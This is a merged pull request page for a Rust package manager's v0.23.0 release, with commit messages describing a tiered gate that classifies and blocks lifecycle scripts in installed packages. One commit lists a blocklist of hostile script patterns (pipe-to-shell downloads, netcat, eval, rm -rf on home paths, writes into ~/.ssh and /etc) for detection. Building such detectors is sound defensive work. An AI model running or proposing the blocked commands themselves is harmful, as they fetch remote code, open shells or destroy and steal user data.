Phase 46.0 — tiered script-policy gate (v0.23.0 released)#7

Merged
tolgaergin merged 61 commits into main from phase-46 on Apr 23, 2026

@tolgaergin
Contributor

Summary

Merges phase-46 onto main, documenting the v0.23.0 release cut
on 2026-04-23.

main was held pristine during the entire phase-46 development
window (54 feature commits) so this merge is a clean fast-forward
with the full code change in a single PR, plus three tag-cut-day
commits (bench harness fix, perf fix, bench baseline).

Tag v0.23.0 was cut on phase-46 @ cb01216 before this PR was
opened, and the Release workflow has already completed green:
binaries published to npm + Homebrew formula updated + wrapper
package refreshed. This PR is merge-only — not release-in-flight.

What's in 46.0

Ships the four-layer tiered lifecycle-script gate
(§4 of the plan doc):

  • P1 schema + loader + --policy=deny|allow|triage + trust
    snapshot
  • P2 static-gate classifier (≥500-entry corpus, ≥60% green,
    zero false-positive reds)
  • P3 cooldown (--min-release-age + minimumReleaseAge)
  • P4 provenance-drift gate (Sigstore attestation identity
    check) + --ignore-provenance-drift[-all] overrides
  • P5 filesystem-scoped sandbox (macOS Seatbelt)
  • P6 tier-aware auto-build (hard-gated on P5)
  • P7 version-diff UI (script-hash drift + behavioral-tag
    delta render)

P8 (LLM triage) deferred to Phase 46.1. Hard preconditions
P5 + P6 ship here.

Tag-cut validation (§18)

| Gate | Target | Result |
|------|--------|--------|
| §18 red-count on Next.js 16.2.4 | 0 | 0 |
| §12.7 Axis 1 (classification, autoBuild off) | ≤5% vs deny | −15% (noise-dominant) ✅ |
| §12.7 Axis 2 (control-path, autoBuild on) | ≤5% vs deny | +3% ✅ |
| §13.1 A/B main vs phase-46 under deny (277-pkg) | ~0% | +7.8% (noise floor) |

Full validation doc:
a-package-manager/DOCS/new-features/37-rust-client-phase46-nextjs-validation.md
(filled in on the companion branch, pushed separately to
tolgaergin/a-package-manager#phase-46-p4-server-side).

Full bench baseline:
bench/baselines/2026-04-23-46.0-macos-arm64.md.

Tag-cut day commits (this week)

  • ed001fa — bench harness honors BENCH_WORK_DIR +
    BENCH_PROJECT_DIR env overrides so cold-install-clean
    doesn't trigger VS Code --no-ignore rg storms on the
    workspace
  • f19d23e — install.rs > build_blocked_set_metadata fanout
    via futures::future::join_all — serial per-package awaits
    cost ~770 ms on a 277-pkg tree, parallel cost ~200 ms
    (noise-floor deny-mode delta)
  • 4607f4f — macOS arm64 bench baseline for the 46.0 tag cut
  • cb01216 — version bump to 0.23.0

Scope boundary (§17)

Project installs only. Global-install support for the tiered
gate ships in Phase 46.1 alongside LLM triage (P8).

Test plan

  • Local CI gate green:
      - cargo clippy --workspace --all-targets -- -D warnings
      - cargo fmt --check
      - fancy-regex guard
      - cargo build --workspace
      - cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast — 4217/4217
      - cargo test -p lpm-auth × 3 — 47/47 each
  • §18 Next.js red-count validation captured on 2026-04-22 23:55
  • §12.7 cold-install-triage axes captured on 2026-04-22 23:45
  • §13.1 A/B cross-binary post-fix captured on 2026-04-23 ~10:00
  • Release workflow v0.23.0 green (npm + Homebrew + wrapper published)
  • CI on this PR green (it runs on PR open)

🤖 Generated with Claude Code

tolgaergin and others added 30 commits April 20, 2026 23:40
…, BlockedPackage fields

Adds the persisted-schema primitives for Phase 46's tiered triage gate
(plan §6). No BUILD_STATE_VERSION bump: additions are Option<T> with
serde defaults, so pre-46 and Phase-46 readers are mutually compatible.

New types in lpm-security:
- StaticTier enum (green | amber | amber-llm | red), kebab-case wire
- ProvenanceSnapshot { present, publisher, workflow, cert_sha256 }

BlockedPackage extensions (ownership per §11 field-ownership rule):
- static_tier — populated by P2 static classifier
- provenance_at_capture — populated by P4 provenance drift
- published_at — populated by P1 metadata plumbing
- behavioral_tags_hash — populated by P1 metadata plumbing

Reader check relaxed `!=` → `>` so future minor additions don't
invalidate existing .lpm/build-state.json. Bump policy documented on
BUILD_STATE_VERSION: only breaking changes warrant a bump.
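
A minimal sketch of the relaxed reader check, for illustration only. The
constant's value and the function name `check_state_version` are
assumptions, not the actual lpm code; only the `>` comparison comes from
the description above.

```rust
/// Stand-in for the real constant; the value 1 is illustrative.
const BUILD_STATE_VERSION: u32 = 1;

/// Hypothetical helper: decides whether this reader may load a
/// build-state file that declares `state_version`.
fn check_state_version(state_version: u32) -> Result<(), String> {
    // Old check (as described): any mismatch (`!=`) was rejected.
    // Relaxed check: only files written by a newer schema are refused.
    if state_version > BUILD_STATE_VERSION {
        return Err(format!(
            "build-state version {state_version} is newer than supported version {BUILD_STATE_VERSION}"
        ));
    }
    Ok(())
}
```

With this shape, equal and older versions load, and only a newer
state_version is rejected.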

Tests:
- StaticTier kebab-case serialization, round-trip, rejection of
  camelCase + unknown variants
- ProvenanceSnapshot full + absent + partial parse + strict equality
- BlockedPackage mutual-compat both directions (v1 reader on
  Phase-46-written file; Phase-46 reader on v1-written file)
- Reader rejects state_version > BUILD_STATE_VERSION; accepts equal

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
3713/3714 tests pass (1 unrelated perf-threshold flake in lpm-task
filter::eval, different test each retry — load sensitivity, not a
regression).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ge flags

Adds the second P1 chunk: consolidated script-config loader, the new
policy-mode enum, and the CLI flag surface (plan §5.4 + D22). No
execution-semantics change yet — P1 only plumbs the resolved policy
through; tier-aware execution lands in P6 after the sandbox (D20).

New module: crates/lpm-cli/src/script_policy_config.rs
- ScriptPolicy enum (Deny | Allow | Triage), kebab-case wire, serde
  default = Deny
- ScriptPolicyConfig { policy, auto_build, deny_all, trusted_scopes }
  — one package.json pass for all four script-related keys
- collapse_policy_flags(): combines --policy / --yolo / --triage into
  a single Option<ScriptPolicy>, trusting clap's conflicts_with_all
  for the mutual-exclusion invariant
- resolve_script_policy(): full precedence chain
  CLI > package.json > ~/.lpm/config.toml > default (deny)
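
The flag collapse and the precedence chain above can be sketched as
follows. This is a simplified illustration: the real functions take clap
arguments and a loaded config, whereas the plain `Option` parameters and
the error text here are assumptions.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
enum ScriptPolicy {
    #[default]
    Deny,
    Allow,
    Triage,
}

/// Simplified stand-in for collapse_policy_flags(): mutual exclusion of
/// the three flags is assumed to be enforced earlier (by clap).
fn collapse_policy_flags(
    policy: Option<&str>,
    yolo: bool,
    triage: bool,
) -> Result<Option<ScriptPolicy>, String> {
    if let Some(raw) = policy {
        return match raw {
            "deny" => Ok(Some(ScriptPolicy::Deny)),
            "allow" => Ok(Some(ScriptPolicy::Allow)),
            "triage" => Ok(Some(ScriptPolicy::Triage)),
            other => Err(format!(
                "invalid --policy value '{other}' (expected one of: deny, allow, triage)"
            )),
        };
    }
    if yolo {
        return Ok(Some(ScriptPolicy::Allow));
    }
    if triage {
        return Ok(Some(ScriptPolicy::Triage));
    }
    Ok(None)
}

/// Simplified stand-in for resolve_script_policy():
/// CLI > package.json > global config > default (deny).
fn resolve_script_policy(
    cli: Option<ScriptPolicy>,
    package_json: Option<ScriptPolicy>,
    global: Option<ScriptPolicy>,
) -> ScriptPolicy {
    cli.or(package_json).or(global).unwrap_or_default()
}
```

Keeping each layer as an `Option` preserves the explicit-deny-vs-unset
distinction: `Some(Deny)` at a higher layer still wins over `Some(Allow)`
at a lower one.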

CLI surface on both `lpm install` and `lpm build`:
- --policy=deny|allow|triage (canonical)
- --yolo (alias for --policy=allow)
- --triage (alias for --policy=triage)
Mutual-exclusion enforced at clap layer via conflicts_with_all;
invalid --policy values produce an actionable error naming the value
and the accepted list.

Consolidation: deleted the two ad-hoc script-config readers:
- read_auto_build_config (install.rs:5480) → ScriptPolicyConfig.auto_build
- read_deny_all_config  (build.rs:838)    → ScriptPolicyConfig.deny_all
Their dedicated tests are removed; equivalent coverage lives in
script_policy_config::tests (15 tests: kebab parsing, all-four-keys
load, explicit-deny-vs-unset distinction, malformed JSON, invalid
value silent fallthrough, full precedence chain).

Verified end-to-end:
- `lpm install --help` renders all three flags with precedence doc
- `lpm install --yolo --triage` → clean clap conflict error
- `lpm install --policy=garbage` → actionable message with valid list

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1695/1695 tests pass on touched crates (lpm-security + lpm-cli). The
lpm-task filter::eval perf-threshold tests flake under parallel load
across the whole workspace; isolated serial re-run passes 168/168,
confirming load sensitivity rather than a regression.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…criptPolicy typos

Addresses two Medium findings from the third-round audit of the P1
CLI-surface commit (a15cbd3):

Finding 1 — Help text promised behavior that doesn't exist yet.
Previous copy on --policy / --yolo / --triage described execution
semantics ("run every script without gating", "greens auto-approve in
sandbox") that land in a later phase; today these flags are accepted,
resolved, and logged only. Users running `lpm install --yolo` today
would reasonably expect scripts to run and be confused when nothing
changed. Rewrote help copy on both install and build to open with
"Status in this build (Phase 46 P1): flag accepted and logged; does
NOT change execution behavior yet" and follow with what each value
*will* do. Lets CI / scripts opt in to future behavior now without
misleading the current UX.

Finding 2 — Invalid package.json > lpm > scriptPolicy silently
ignored. Previous behavior: a typo in a team-shared manifest fell
through to each developer's ~/.lpm/config.toml or the default, silently
producing per-developer policy divergence. This is the wrong failure
mode for shared config.

ScriptPolicyConfig now carries `policy_parse_error: Option<String>`:
when `scriptPolicy` is present as a string but doesn't parse, this
field holds the offending input (loader still returns `policy: None`
so precedence falls through to global / default — the resolver's
contract is unchanged). Install + build handlers check the field and
emit `output::warn` with the value and accepted list when not in JSON
mode, so a typo is user-visible on every install.

Tested live: `package.json` with `"scriptPolicy": "invalid-typo"`
produces:
  ▲  package.json > lpm > scriptPolicy: invalid value 'invalid-typo'
     (expected one of: deny, allow, triage); falling back to user
     config / default

Architecture refactor: resolve_script_policy(cli, &Path) →
resolve_script_policy(cli, &ScriptPolicyConfig). Callers now load the
config once at handler entry, inspect policy_parse_error, then pass
the loaded config to the resolver. De-duplicates the two loader calls
per invocation and keeps warning-emission a caller concern (loader
has no knowledge of JSON mode or color output).

Tests:
- Renamed from_package_json_invalid_script_policy_is_silent_none →
  ..._surfaces_parse_error; asserts both policy==None AND
  policy_parse_error==Some(input)
- New from_package_json_valid_script_policy_has_no_parse_error
- New from_package_json_absent_script_policy_has_no_parse_error
- New resolve_ignores_parse_error_uses_fallthrough pins the resolver
  contract: parse-error does not block resolution
- Existing resolve_* tests updated for new signature

Finding 3 (helpers still use lenient name-only gate) is addressed in
the next planned P1 chunk (helper migration) per the field-ownership
discipline in the plan's §11 P1 scope.

Full-workspace CI gate: clippy -D warnings clean, fmt clean, 18/18
script_policy_config tests pass. lpm-task filter::eval perf-threshold
flakes under parallel load continue to be unrelated to these crates.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ve policy

Addresses the Low-severity wording drift from the fourth-round audit:
the scriptPolicy typo warning was emitted BEFORE resolution and always
said the value was "falling back to user config / default". That is
only true when no CLI override is present. When the user passes
--policy, --yolo, or --triage, the CLI override is what actually
wins — so the warning's tail was misleading in that case.

Fix: move warning emission to AFTER `resolve_script_policy` and
include the resolved value in the message. One message works
across all three precedence paths:

  no CLI override → "…effective policy: deny"   (or global, if set)
  --yolo          → "…effective policy: allow"
  --policy=triage → "…effective policy: triage"

Ordering is preserved: invalid CLI flag values (e.g. --policy=garbage)
still error out via `collapse_policy_flags` BEFORE we'd emit the
package.json warning, so the CLI error takes precedence over the
manifest warning as before.

Tested live:
  ▲  package.json > lpm > scriptPolicy: invalid value 'invalid-typo'
     (expected one of: deny, allow, triage); this key was ignored —
     effective policy: <deny|allow|triage>

Workspace gate clean: clippy -D warnings, fmt, 1698/1698 tests pass
on touched crates.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…cripted_packages_trusted use strict gate

Closes audit Finding 3 (third-round review). Pre-existing drift:
`build::run` uses `can_run_scripts_strict` (binds to
{name, version, integrity, script_hash}), but both the install-time
hint and the auto-build "all trusted" predicate used the lenient
`policy.can_run_scripts(name)` gate. Consequence: a drifted rich
binding was shown as `trusted ✓` in the install hint AND satisfied
the auto-build predicate, even though `build::run` would then skip
it — confusing UX at best, silent trust-drift bypass at worst.

Both helpers now use the same four-way TrustMatch handling as
`build::run` at build.rs:133:
  - Strict         → trusted
  - LegacyNameOnly → trusted (build::run still runs with deprecation)
  - BindingDrift   → NOT trusted (behavior fix)
  - NotTrusted     → NOT trusted
OR-composed with is_scope_trusted, matching build::run exactly.
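
As an illustration of the four-way handling above, a minimal sketch. The
variant names come from this message; the function `is_trusted` and its
boolean `scope_trusted` parameter are assumptions standing in for the real
helpers.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum TrustMatch {
    Strict,
    LegacyNameOnly,
    BindingDrift,
    NotTrusted,
}

/// Hypothetical predicate shared by the install hint and the auto-build
/// check: the binding result OR-composed with scope-level trust.
fn is_trusted(binding: TrustMatch, scope_trusted: bool) -> bool {
    let binding_trusted = match binding {
        TrustMatch::Strict | TrustMatch::LegacyNameOnly => true,
        // The behavior fix: a drifted rich binding no longer counts.
        TrustMatch::BindingDrift | TrustMatch::NotTrusted => false,
    };
    binding_trusted || scope_trusted
}
```

The exhaustive match means a future fifth variant fails to compile until
its trust decision is made explicit.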

Signature change: both helpers' `packages` argument is now
`&[(String, String, Option<String>)]` (name, version, integrity).
Three call sites in install.rs updated to thread integrity through
(it's already on the existing InstallPackage struct — one field, no
data-flow refactor needed).

Extracted `scriptable_package_rows()` as a pure helper that
`show_install_build_hint()` now wraps; the pure helper is the test
surface for reviewer-prescribed regression case A.

Tests (reviewer prescription + positive control):
  A. show_install_hint_drifted_rich_binding_is_not_trusted — drifted
     rich binding MUST NOT be shown as `trusted ✓`. Pre-migration
     this asserted true against `is_trusted`; now asserts false.
  B. all_scripted_packages_trusted_false_on_drifted_rich_binding —
     drifted rich binding MUST NOT satisfy the auto-build predicate.
     Pre-migration: true; now false.
  Positive control: scriptable_rows_strict_match_is_trusted — a rich
     binding whose scriptHash matches the on-disk hash IS trusted.
     Proves the drift tests distinguish "drifted" from "no binding."

Three existing helper tests updated to the new tuple signature
(integrity: None preserves their semantics since they use legacy
bare-name `trustedDependencies` arrays, which parse as LegacyNameOnly
— treated as trusted by both old and new gates).

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1701/1701 tests pass on touched crates (lpm-cli + lpm-security). The
lpm-task filter::eval perf-threshold tests continue to flake under
parallel load; serial re-run 168/168 confirms unrelated to this
migration.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…_hash populated on BlockedPackage

Closes the first of the three remaining P1 chunks. The Phase 46 schema
added optional `published_at` and `behavioral_tags_hash` fields to
BlockedPackage (commit 474fc59) but left them always-None; this commit
wires the producer that populates them from registry metadata.

New machinery:
- lpm-registry: BehavioralTags::active_tag_names() returns the canonical
  camelCase names of the 22 tag-fields that are true, sorted
  lexicographically. Static strings mirror the serde renames and the
  server-side behavioral-tags.js schema so the hash is portable.
- lpm-security::triage: hash_behavioral_tag_set(&[&str]) produces a
  deterministic "sha256-<hex>" digest with NUL separators (adjacency-
  collision defense). Empty input hashes to a stable, non-empty value
  (SHA-256 of empty string); callers distinguish "no active tags" from
  "no metadata" at the call site.
- build_state: BlockedSetMetadata + BlockedSetMetadataEntry types
  (keyed by (name, version)). New entry points
  compute_blocked_packages_with_metadata and
  capture_blocked_set_after_install_with_metadata consume the map.
  Existing signatures preserved as thin wrappers passing an empty
  metadata map — zero test churn across the ~30 callers that use them.
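
To show why the NUL separator matters, here is a sketch of the pre-image
construction only. The SHA-256 step is left out to keep the example
dependency-free, the helper name `tag_set_preimage` is hypothetical, and
placing the separator between elements (rather than after each one) is an
assumption.

```rust
/// Hypothetical helper: builds the byte string that would be fed to
/// SHA-256. Tags are joined with a single NUL byte between elements.
fn tag_set_preimage(sorted_tags: &[&str]) -> Vec<u8> {
    let mut buf = Vec::new();
    for (i, tag) in sorted_tags.iter().enumerate() {
        if i > 0 {
            buf.push(0u8); // separator: cannot occur inside a tag name
        }
        buf.extend_from_slice(tag.as_bytes());
    }
    buf
}
```

Without the separator, the inputs ["ab", "c"] and ["a", "bc"] would both
concatenate to "abc" and hash identically; with it they produce distinct
byte strings. The empty input yields an empty pre-image, consistent with
the "SHA-256 of empty string" behavior noted above.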

Install pipeline (install.rs):
- build_blocked_set_metadata() async helper iterates packages and
  fetches registry metadata via the existing TTL-cached client API.
  Extracts time[version] → published_at and versions[version]
  ._behavioralTags → hash_behavioral_tag_set. Returns empty map on
  errors (graceful degradation; must never fail install).
- Primary install path calls the _with_metadata variant with the
  built map. Fast-path (run_link_and_finish) still uses the no-
  metadata wrapper — fields stay None there, which is documented
  degradation (the lockfile fast-path has no populated TTL cache).

Tests (5 new in build_state::tests):
- compute_with_metadata_forwards_published_at_and_behavioral_tags_hash
- compute_with_metadata_missing_entry_leaves_fields_none (graceful)
- compute_with_metadata_partial_entry_forwards_only_populated_half
- backward_compat_wrapper_captures_with_empty_metadata
- metadata_fingerprint_is_independent_of_metadata (design invariant:
  the blocked-set fingerprint is over blockable packages + their
  strict binding only, NOT over their metadata — registry churn
  must not re-fire the blocked-set suppression banner)

Plus 6 new tests in lpm-security::triage::tests covering the hashing
helper: sha256- prefix + fixed length, empty-input pinned digest,
order sensitivity (caller contract), NUL-separator adjacency defense,
determinism, subset-distinction.

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1821/1821 tests pass on touched crates. Field ownership matches the
Phase 46 plan §11 P1 table: published_at + behavioral_tags_hash
are P1-owned; static_tier + provenance_at_capture remain None until
P2 and P4.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Closes the second of the three remaining P1 chunks. Implements plan
§4.2: detect silent additions to `package.json > lpm >
trustedDependencies` between installs. Motivating case: a "bump dep"
PR that quietly grows the trust list gets flagged locally instead of
slipping past code review.

New module: crates/lpm-cli/src/trust_snapshot.rs
- TrustSnapshot { schema_version, captured_at, bindings } persisted
  to `<project_dir>/.lpm/trust-snapshot.json`. BTreeMap-keyed for
  deterministic on-disk ordering.
- SnapshotEntry { integrity, script_hash } — minimal 2-field
  projection of TrustedDependencyBinding. Does NOT capture Phase 46
  audit fields (approved_by, approved_by_model_exact) — those belong
  to the manifest's audit trail, not the "did-the-set-change" diff.
- TrustSnapshot::capture_current pattern-matches the Legacy / Rich
  variants directly rather than calling TrustedDependencies::iter
  (which normalizes keys to the name-portion only and would collapse
  per-version granularity).
- TrustSnapshot::diff_additions — keys in current not in previous,
  sorted. Returns empty on "no previous" (first install). Deliberately
  ignores removals (not a security concern) and same-key binding
  changes (already handled by BindingDrift in the install path).
- Schema-versioned parallel to BuildState: SCHEMA_VERSION = 1; same
  no-version-bump policy for additive field changes.
- format_new_bindings_notice produces the user-facing multi-line
  notice pointing at `lpm trust diff` (the inspection CTA — ships
  in chunk C).
- write_snapshot is atomic (temp-then-rename); crash safety matches
  build-state.json.
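
The additions-only diff described above can be sketched as follows. The
field types on `SnapshotEntry` and the free-function signature are
assumptions; the real method lives on TrustSnapshot.

```rust
use std::collections::BTreeMap;

/// Two-field projection; Option<String> field types are assumed.
#[derive(Debug, Clone, PartialEq, Eq)]
struct SnapshotEntry {
    integrity: Option<String>,
    script_hash: Option<String>,
}

type Bindings = BTreeMap<String, SnapshotEntry>;

/// Keys present in `current` but not in `previous`. BTreeMap iteration
/// is ordered, so the result is already sorted.
fn diff_additions(previous: Option<&Bindings>, current: &Bindings) -> Vec<String> {
    // First install: no previous snapshot, so nothing counts as "added".
    let Some(previous) = previous else {
        return Vec::new();
    };
    current
        .keys()
        .filter(|key| !previous.contains_key(*key))
        .cloned()
        .collect()
}
```

Only key membership is compared, so removals and same-key binding changes
fall out of the result by construction.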

Install pipeline (install.rs):
- Pre-install: after "Installing dependencies for X" and before the
  lockfile fast-path branch, read prior snapshot, diff against
  current manifest, emit notice via output::info. Suppressed in
  --json mode (no stable JSON schema yet; agents get the same data
  from `lpm trust diff` in chunk C).
- Post-install: snapshot write on BOTH the main path and the
  run_link_and_finish fast path. The fast path is reached when only
  trustedDependencies changed (lockfile still valid) so skipping
  snapshot write there would leave the next install diffing against
  stale state. Write failures are tracing::warn only — non-fatal,
  graceful degradation.
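
For reference, a minimal sketch of the temp-then-rename pattern used for
the snapshot write, using only the standard library. The function name
`write_atomic` and the `.tmp` suffix convention are assumptions; a
production writer would likely also sync the file before renaming.

```rust
use std::fs;
use std::io;
use std::path::Path;

/// Hypothetical helper: write `contents` to a sibling temp file, then
/// rename it over `target` so readers never observe a partial file.
fn write_atomic(target: &Path, contents: &[u8]) -> io::Result<()> {
    let mut tmp_name = target
        .file_name()
        .ok_or_else(|| io::Error::new(io::ErrorKind::InvalidInput, "target has no file name"))?
        .to_os_string();
    tmp_name.push(".tmp");
    let tmp_path = target.with_file_name(tmp_name);

    fs::write(&tmp_path, contents)?;
    // On success the temp file no longer exists under its old name.
    fs::rename(&tmp_path, target)
}
```

A caller in the install path would log a warning on `Err` and continue,
matching the non-fatal behavior described above.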

Tests (16 in trust_snapshot::tests):
- capture_current: empty, rich bindings, legacy bare-name keying
- diff_additions: no previous, additions detected, removals ignored,
  binding-changes ignored, multi-addition sort invariant
- format_new_bindings_notice: empty → None, populated → CTA present
- read/write: round-trip, missing file, malformed JSON, newer
  schema_version refused, atomic-write leaves no .tmp file
- End-to-end regression (audit prescription A):
  install_n_writes_snapshot_install_n_plus_1_detects_addition —
  simulates the full flow from snapshot-write through diff on the
  next install; asserts both the additions list and the rendered
  notice include the poisoned-PR addition.

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1837/1837 tests pass on touched crates. Field ownership: P1 owns
.lpm/trust-snapshot.json per plan §11 — done here.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…complete

Closes the final P1 chunk. Adds the user-facing surface over the
trust-snapshot persistence machinery (8c03c55) — inspection via
`lpm trust diff`, active cleanup via `lpm trust prune`.

New module: crates/lpm-cli/src/commands/trust.rs
- TrustCmd clap subcommand enum with Diff and Prune variants.
- compute_full_diff returns added / removed / changed entries across
  the snapshot → current manifest transition, ordered
  added-then-removed-then-changed with stable lexicographic sort
  within each class (matches the rendering convention).
- compute_stale_keys extracts the NAME portion from Rich keys
  (`name@version`) via `rfind('@')` so scoped packages like
  `@myorg/pkg@1.0.0` resolve to `@myorg/pkg` correctly. Version
  drift (same name, different version) is NOT flagged as stale —
  that's BindingDrift territory.
- remove_stale_from_manifest handles both Legacy (filter array in
  place) and Rich (remove map keys) shapes of trustedDependencies.
- Atomic manifest writer (temp-then-rename) mirrors the snapshot
  writer's crash-safety pattern.
- Stable JSON schema on `--json` with SCHEMA_VERSION = 1 per P9
  telemetry discipline.
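
The last-@ rule for name extraction can be sketched as below. Function
names and the slice-based signature are assumptions; treating an `@` at
index 0 as a scope marker rather than a version separator is also an
assumption, added here so bare scoped names survive intact.

```rust
use std::collections::BTreeSet;

/// Hypothetical helper: strips a trailing `@version` from a binding key.
fn binding_name(key: &str) -> &str {
    match key.rfind('@') {
        // Index 0 is the scope prefix of a bare scoped name, not a version.
        Some(idx) if idx > 0 => &key[..idx],
        _ => key,
    }
}

/// Keys whose package NAME is no longer installed. A different version
/// of an installed name is not stale.
fn stale_keys<'a>(trusted_keys: &[&'a str], installed: &BTreeSet<&str>) -> Vec<&'a str> {
    trusted_keys
        .iter()
        .copied()
        .filter(|key| !installed.contains(binding_name(key)))
        .collect()
}
```

Using `rfind` rather than `find` is what keeps `@myorg/pkg@1.0.0` from
being split at the scope marker.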

`lpm trust diff`:
- `--json` emits structured { added, removed, changed } arrays plus
  the snapshot's `captured_at` for agent consumption.
- Human mode renders `+ added`, `- removed`, `~ changed` with
  per-field delta ("integrity: sha512-old → sha512-new") for changed
  entries.
- Empty diff reports "unchanged since last install (<timestamp>)".

`lpm trust prune`:
- Reads lpm.lock to determine installed names; refuses to run if
  lockfile is missing.
- `--dry-run` to preview; `--yes` for non-TTY; non-TTY without
  `--yes` is a hard error (prevents silent mutation in CI).
- `--json` emits `{ stale_count, stale[], dry_run, mutated }`.
- Confirmation prompt on TTY via cliclack.

main.rs:
- New `Trust { action: TrustCmd }` variant with inline subcommand
  dispatch following the `Global { action: GlobalCmd }` pattern
  already established in the codebase.

Tests (13 in commands::trust::tests):
- compute_full_diff: empty, added/removed/changed classification +
  ordering invariant, identical → empty
- compute_stale_keys: rich entries by name (strips @version),
  scoped package name extraction (last-@ rule), legacy bare names,
  empty manifest, version-drift-is-not-stale regression
- remove_stale_from_manifest: rich map, legacy array, nonexistent
  key is no-op
- write_manifest atomic-write-no-tmp-leak
- End-to-end prune_removes_stale_entry_and_leaves_active_entry_intact
  (audit prescription B): real package.json + fake lockfile, invoke
  run_prune via tokio runtime, assert file contents post-mutation.

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1850/1850 tests pass on touched crates (lpm-cli + lpm-security +
lpm-registry).

Phase 46 P1 IS COMPLETE. Branch phase-46 has 8 commits covering:
- Schema extensions (474fc59)
- ScriptPolicyConfig + --policy/--yolo/--triage flags (a15cbd3)
- Audit honesty fixes: help text + scriptPolicy typo warning (403a041)
- Audit v3: warning names effective policy (665e74b)
- Helper migration: strict gate in show_install_build_hint +
  all_scripted_packages_trusted (107fde5)
- Metadata plumbing: published_at + behavioral_tags_hash (f13541c)
- Trust-snapshot persistence + diff notice (8c03c55)
- lpm trust diff + lpm trust prune (this commit)

Next phase: P2 static classifier. All P1 field-ownership obligations
met per plan §11:
  - Schema extensions (done)
  - Helper migration (done)
  - Config consolidation (ScriptPolicyConfig done)
  - Metadata plumbing (published_at, behavioral_tags_hash done)
  - Trust-snapshot persistence (done)
  - lpm trust diff/prune (done)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… + error on malformed TD

Closes two Low findings from the end-of-P1 audit:

F1 — `lpm trust prune --json` emitted the structured output BEFORE
the write, with an optimistic `mutated: true` that the subsequent
non-TTY/confirmation guard could invalidate by erroring out. The JSON
contract was unreliable for automation.

Fix: restructure `run_prune` so at most ONE terminal output is emitted
per invocation, always post-mutation (or post-decision-not-to-mutate):
  - empty stale → mutated: false, no write
  - dry-run → mutated: false, no write
  - non-TTY + !yes → Err before any output
  - write_manifest fails → Err propagates, no JSON emitted
  - success → mutated: true, emitted AFTER write_manifest returns Ok

`mutated` is now an accurate post-condition, not a prediction.
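
A sketch of the restructured control flow, under simplifying assumptions:
the interactive TTY confirmation is omitted, errors are plain strings, and
`PruneReport` / `run_prune_sketch` are hypothetical names. The caller
would emit the returned report exactly once.

```rust
#[derive(Debug, PartialEq, Eq)]
struct PruneReport {
    stale_count: usize,
    dry_run: bool,
    mutated: bool,
}

/// Returns the single report to emit, or an error with no report at all.
fn run_prune_sketch(
    stale_count: usize,
    dry_run: bool,
    is_tty: bool,
    yes: bool,
    write_manifest: impl FnOnce() -> Result<(), String>,
) -> Result<PruneReport, String> {
    // Nothing to do, or preview only: report without touching the file.
    if stale_count == 0 || dry_run {
        return Ok(PruneReport { stale_count, dry_run, mutated: false });
    }
    // Non-interactive sessions must opt in explicitly.
    if !is_tty && !yes {
        return Err("refusing to modify package.json without --yes in a non-TTY session".to_string());
    }
    // A write failure propagates here, before any report exists.
    write_manifest()?;
    Ok(PruneReport { stale_count, dry_run, mutated: true })
}
```

Because the report is only constructed after the write returns, there is
no code path that yields `mutated: true` for an unmodified manifest.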

F2 — `extract_trusted_dependencies` used `unwrap_or_default()`, so a
manifest with a malformed `lpm.trustedDependencies` value (typo, wrong
shape, etc.) silently degraded to "empty set" — prune then reported
"nothing to prune" and exited 0. The typed read path used by `trust
diff` (via `lpm_workspace::read_package_json`) already errors on this;
`trust prune` now matches that strictness.

Fix: `extract_trusted_dependencies` returns Result<TrustedDependencies,
LpmError>; propagates via `?` in run_prune. Error message names the
offending key and the accepted forms (legacy array vs. Phase-4 rich
map). Absent key path unchanged — still Ok(default).

Tests (7 new in commands::trust::tests, bringing trust to 20/20):

Unit:
- extract_trusted_dependencies_absent_key_is_ok_default
- extract_trusted_dependencies_valid_legacy_array_parses
- extract_trusted_dependencies_valid_rich_map_parses
- extract_trusted_dependencies_malformed_shape_errors (4 bad shapes
  exercised: number, string, bool, array-of-non-strings)

End-to-end (filesystem-observable post-conditions — no stdout capture
required, because file state on disk is the authoritative proof that
the JSON emission matches reality):
- run_prune_empty_stale_does_not_mutate_manifest — byte-identical
  pre/post, proves no spurious write when nothing is stale
- run_prune_dry_run_does_not_mutate_manifest — same, with a real
  stale entry present and --dry-run honored
- run_prune_malformed_trusted_deps_errors_before_any_write — F2
  end-to-end: bad shape surfaces as LpmError + file unchanged

Full-workspace CI gate: clippy -D warnings clean, fmt clean, 20/20
trust tests pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
New pure, deterministic classifier for lifecycle-script bodies.
Emits Green | Amber | Red only; AmberLlm is reserved for P8.

Classification semantics (P2 = classification-only per D20):
- Green: exact match of curated allowlist (node-gyp rebuild, tsc
  [-b|-p path], prisma generate, husky [install], electron-rebuild,
  node <safe-relative>.{js,cjs,mjs} where basename is NOT install.js
  / postinstall.js).
- Red: hand-curated blocklist — pipe-to-shell (curl|sh, wget|bash,
  base64 -d|sh), node -e / --eval, iex / nc / netcat / ncat / eval,
  nested package managers (npm/pnpm/yarn/bun/lpm/pip/gem/cargo/brew
  install), rm -rf on ~/$HOME/absolute paths, chmod +x/777 outside
  package, redirects into ~/.bashrc / ~/.ssh/** / /etc/** /root/**,
  PowerShell literals (Invoke-Expression, FromBase64String,
  Add-MpPreference), Unicode control chars (Trojan Source class).
- Amber: everything else, including compound commands AND network
  binary downloaders (playwright install, puppeteer, cypress install,
  electron-builder install-app-deps) per D18.

Pipeline ordering (per §4.1 with the review-round refinement):
  1. Raw-string red prefilter (Unicode + PowerShell literals)
